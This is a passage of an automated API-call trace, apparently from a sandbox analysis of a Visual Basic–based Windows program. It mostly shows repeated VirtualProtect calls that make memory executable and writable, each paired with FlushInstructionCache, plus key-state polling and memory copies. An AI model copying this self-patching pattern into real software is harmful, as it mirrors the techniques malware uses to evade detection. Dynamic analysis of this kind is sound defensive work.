dwSize=0x2) returned 1 [0093.721] GetCurrentProcess () returned 0xffffffff [0093.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.721] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.722] GetCurrentProcess () returned 0xffffffff [0093.722] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.722] GetCurrentProcess () returned 0xffffffff [0093.722] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.722] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.723] GetCurrentProcess () returned 0xffffffff [0093.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.723] GetCurrentProcess () returned 0xffffffff [0093.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.723] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.724] GetCurrentProcess () returned 0xffffffff [0093.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.724] GetCurrentProcess () returned 0xffffffff [0093.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.724] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.724] GetCurrentProcess () returned 0xffffffff [0093.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.725] GetCurrentProcess () returned 0xffffffff [0093.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.725] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.725] GetCurrentProcess () returned 0xffffffff [0093.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.725] GetCurrentProcess () returned 0xffffffff [0093.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.725] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.762] GetCurrentProcess () returned 0xffffffff [0093.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.762] GetCurrentProcess () returned 0xffffffff [0093.762] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.762] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.765] GetCurrentProcess () returned 0xffffffff [0093.766] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.766] GetCurrentProcess () returned 0xffffffff [0093.771] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.771] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.773] GetCurrentProcess () returned 0xffffffff [0093.773] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.774] GetCurrentProcess () returned 0xffffffff [0093.774] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.774] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.774] GetCurrentProcess () returned 0xffffffff [0093.774] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.774] GetCurrentProcess () returned 0xffffffff [0093.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.775] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.775] GetCurrentProcess () returned 0xffffffff [0093.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.775] GetCurrentProcess () returned 0xffffffff [0093.775] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.776] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.776] GetCurrentProcess () returned 0xffffffff [0093.776] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.776] GetCurrentProcess () returned 0xffffffff [0093.776] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.776] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19748c | out: lpflOldProtect=0x19748c*=0x40) returned 1 [0093.777] GetCurrentProcess () returned 0xffffffff [0093.777] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.778] GetAsyncKeyState (vKey=3) returned 0 [0093.778] GetAsyncKeyState (vKey=3) returned 0 [0093.778] VarCmp (pvarLeft=0x197d98, pvarRight=0x197d88, lcid=0x0, dwFlags=0x30001) returned 0x1 [0093.779] CRetailMalloc_Alloc () returned 0xf4b30e8 [0093.779] memcpy (in: _Dst=0xb2a5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.779] memcpy (in: _Dst=0xb2a5270, _Src=0x197524, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.780] memcpy (in: _Dst=0xb2a5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82d92, cbMultiByte=32, lpWideCharStr=0x197324, cchWideChar=33 | out: lpWideCharStr="——–——––——–—––—–—–—–––––––––——––") returned 32 [0093.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d5e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="——–——––——–—––—–—–—–––––––––——––") returned 32 [0093.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d5e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="——–——––——–—––—–—–—–––––––––——––") returned 32 [0093.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d5e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="——–——––——–—––—–—–—–––––––––——––") returned 32 [0093.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302d5e, cbMultiByte=32, lpWideCharStr=0x197384, cchWideChar=33 | out: lpWideCharStr="——–——––——–—––—–—–—–––––––––——––") returned 32 [0093.781] CRetailMalloc_Alloc () returned 0xc98bc70 [0093.781] _mbscpy_s (in: _Dst=0xc98bc70, _DstSizeInBytes=0x20, _Src=0x11302d5e | out: _Dst=0xc98bc70) returned 0x0 [0093.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40af6, cbMultiByte=39, lpWideCharStr=0x197394, cchWideChar=40 | out: lpWideCharStr="_B_var_——–——––——–—––—–—–—–––––––––——––") returned 39 [0093.782] _mbscpy_s (in: _Dst=0x1973fc, _DstSizeInBytes=0x20, _Src=0x11302d5e | out: _Dst=0x1973fc) returned 0x0 [0093.782] CRetailMalloc_Free () returned 0x1 [0093.782] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.783] memcpy (in: _Dst=0xb2a5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.783] memcpy (in: _Dst=0xb2a5168, _Src=0x197374, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.783] memcpy (in: _Dst=0xb2a5168, _Src=0x197374, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.783] CRetailMalloc_Realloc () returned 0xf4b38f8 [0093.783] memcpy (in: _Dst=0xb2a5168, _Src=0x197374, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.783] memcpy (in: _Dst=0xb2a5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.783] memcpy (in: _Dst=0xb2a5168, _Src=0x197508, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.783] memcpy (in: _Dst=0xf4b3168, _Src=0x1975a4, _Size=0x18 | out: _Dst=0xf4b3168) returned 0xf4b3168 [0093.783] CRetailMalloc_Realloc () returned 0xf4b30e8 [0093.784] CRetailMalloc_Free () returned 0x1 [0093.784] GetCurrentProcess () returned 0xffffffff [0093.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.784] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.785] GetCurrentProcess () returned 0xffffffff [0093.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.785] GetCurrentProcess () returned 0xffffffff [0093.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.785] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.785] GetCurrentProcess () returned 0xffffffff [0093.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.786] GetCurrentProcess () returned 0xffffffff [0093.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.786] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.786] GetCurrentProcess () returned 0xffffffff [0093.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.786] GetCurrentProcess () returned 0xffffffff [0093.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.786] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.787] GetCurrentProcess () returned 0xffffffff [0093.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.787] GetCurrentProcess () returned 0xffffffff [0093.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.787] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.788] GetCurrentProcess () returned 0xffffffff [0093.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.788] GetCurrentProcess () returned 0xffffffff [0093.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.788] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.789] GetCurrentProcess () returned 0xffffffff [0093.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.789] GetCurrentProcess () returned 0xffffffff [0093.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.789] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.791] GetCurrentProcess () returned 0xffffffff [0093.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.791] GetCurrentProcess () returned 0xffffffff [0093.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.791] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.792] GetCurrentProcess () returned 0xffffffff [0093.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.792] GetCurrentProcess () returned 0xffffffff [0093.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.792] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.793] GetCurrentProcess () returned 0xffffffff [0093.793] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.793] GetCurrentProcess () returned 0xffffffff [0093.793] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.793] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.794] GetCurrentProcess () returned 0xffffffff [0093.794] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.794] GetCurrentProcess () returned 0xffffffff [0093.794] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.794] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.795] GetCurrentProcess () returned 0xffffffff [0093.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.795] GetCurrentProcess () returned 0xffffffff [0093.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.795] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.795] GetCurrentProcess () returned 0xffffffff [0093.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.795] GetCurrentProcess () returned 0xffffffff [0093.795] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.795] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.796] GetCurrentProcess () returned 0xffffffff [0093.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.796] GetCurrentProcess () returned 0xffffffff [0093.796] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.796] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.797] GetCurrentProcess () returned 0xffffffff [0093.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.797] GetCurrentProcess () returned 0xffffffff [0093.797] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.797] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.798] GetCurrentProcess () returned 0xffffffff [0093.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.798] GetCurrentProcess () returned 0xffffffff [0093.798] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.798] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.798] GetCurrentProcess () returned 0xffffffff [0093.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.799] GetCurrentProcess () returned 0xffffffff [0093.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.799] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.799] GetCurrentProcess () returned 0xffffffff [0093.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.799] GetCurrentProcess () returned 0xffffffff [0093.799] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.799] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.800] GetCurrentProcess () returned 0xffffffff [0093.800] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.800] GetCurrentProcess () returned 0xffffffff [0093.800] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.800] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.801] GetCurrentProcess () returned 0xffffffff [0093.801] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0093.801] GetCurrentProcess () returned 0xffffffff [0093.801] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.801] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.802] GetCurrentProcess () returned 0xffffffff [0093.802] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.802] GetCurrentProcess () returned 0xffffffff [0093.802] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.802] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.803] GetCurrentProcess () returned 0xffffffff [0093.803] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.803] GetCurrentProcess () returned 0xffffffff [0093.803] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.803] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.804] GetCurrentProcess () returned 0xffffffff [0093.804] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.804] GetCurrentProcess () returned 0xffffffff [0093.804] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.804] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.813] GetCurrentProcess () returned 0xffffffff [0093.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.813] GetCurrentProcess () returned 0xffffffff [0093.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.813] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.829] GetCurrentProcess () returned 0xffffffff [0093.829] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.834] GetCurrentProcess () returned 0xffffffff [0093.834] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.835] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.840] GetCurrentProcess () returned 0xffffffff [0093.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.840] GetCurrentProcess () returned 0xffffffff [0093.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.840] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.841] GetCurrentProcess () returned 0xffffffff [0093.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.841] GetCurrentProcess () returned 0xffffffff [0093.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.842] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.844] GetCurrentProcess () returned 0xffffffff [0093.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.845] GetCurrentProcess () returned 0xffffffff [0093.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.845] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.848] GetCurrentProcess () returned 0xffffffff [0093.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.849] GetCurrentProcess () returned 0xffffffff [0093.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.849] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.852] GetCurrentProcess () returned 0xffffffff [0093.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.852] GetCurrentProcess () returned 0xffffffff [0093.852] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.853] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.857] GetCurrentProcess () returned 0xffffffff [0093.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.857] GetCurrentProcess () returned 0xffffffff [0093.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.857] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19724c | out: lpflOldProtect=0x19724c*=0x40) returned 1 [0093.857] GetCurrentProcess () returned 0xffffffff [0093.857] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.858] GetAsyncKeyState (vKey=3) returned 0 [0093.859] CRetailMalloc_Alloc () returned 0xf4db480 [0093.859] memcpy (in: _Dst=0xb2a5168, _Src=0x1973fc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.859] memcpy (in: _Dst=0xf4db4a0, _Src=0x197464, _Size=0x18 | out: _Dst=0xf4db4a0) returned 0xf4db4a0 [0093.859] CRetailMalloc_Realloc () returned 0xf4db480 [0093.859] CRetailMalloc_Free () returned 0x1 [0093.859] GetCurrentProcess () returned 0xffffffff [0093.859] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.859] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.860] GetCurrentProcess () returned 0xffffffff [0093.860] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.860] GetCurrentProcess () returned 0xffffffff [0093.860] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.860] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.861] GetCurrentProcess () returned 0xffffffff [0093.861] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.861] GetCurrentProcess () returned 0xffffffff [0093.861] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.861] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.862] GetCurrentProcess () returned 0xffffffff [0093.862] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.862] GetCurrentProcess () returned 0xffffffff [0093.862] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.862] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.863] GetCurrentProcess () returned 0xffffffff [0093.863] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.863] GetCurrentProcess () returned 0xffffffff [0093.863] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.863] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.863] GetCurrentProcess () returned 0xffffffff [0093.863] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.864] GetCurrentProcess () returned 0xffffffff [0093.864] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.864] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0093.864] GetCurrentProcess () returned 